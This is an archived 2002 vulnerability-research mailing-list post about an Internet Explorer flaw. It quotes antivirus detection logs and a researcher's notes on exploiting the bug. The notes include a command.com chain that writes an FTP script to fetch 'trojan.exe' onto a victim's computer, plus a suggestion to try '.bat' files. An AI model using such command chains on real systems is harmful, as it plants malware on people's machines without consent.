Vulnerability Development mailing list archives

Re: [Re: Rather large MSIE-hole] another variant

From: Felipe Franciosi <franciozzy () terra com br>
Date: Sat, 16 Mar 2002 01:01:52 -0300

FYI - Norton AV now picks this up.

Scan type:  Realtime Protection Scan
Event:  Virus Found!
Virus name: XMLid.Exploit
File:  C:\XXXXX\Local Settings\Temporary Internet
Files\Content.IE5\C9IVKTMJ\simplebind[1].htm
Location:  Quarantine
Computer:  XXXXXX
User:  XXXXXX
Action taken:  Clean failed : Quarantine succeeded : Access denied
Date found: Fri Mar 15 19:46:32 2002

madness.

My PC CILLIN 2000 also detected the malformed "jpg" files in my
temporary folder...

Just as your norton, it placed the files under quarentine.  The
bad news is that the "malicius web code" scanner is not looking
for this  "jpg"  files  in real time (when you are browsing the
web).

Regards,
Felipe

While trying to execute something like:
"c:/command.com /c echo bin > test",
"c:/command.com /c echo GET trojan.exe >> test",
"c:/windows/ftp.exe ...."

I came up with something interesting:

This bug will NOT execute '.com' files. Maybe it's worth trying
to execute '.bat'  files before attempting to place batch files
on the victim's computer in order to pass parameters.

I  found  this  out  by  discovering  that  it will not execute
"c:/command.com",  so if I'm wrong on my statement, please for-
give me...  I'm  very  tired  and I'm going to bed now. No more
tests for today.

my $.02...

Regards,
Felipe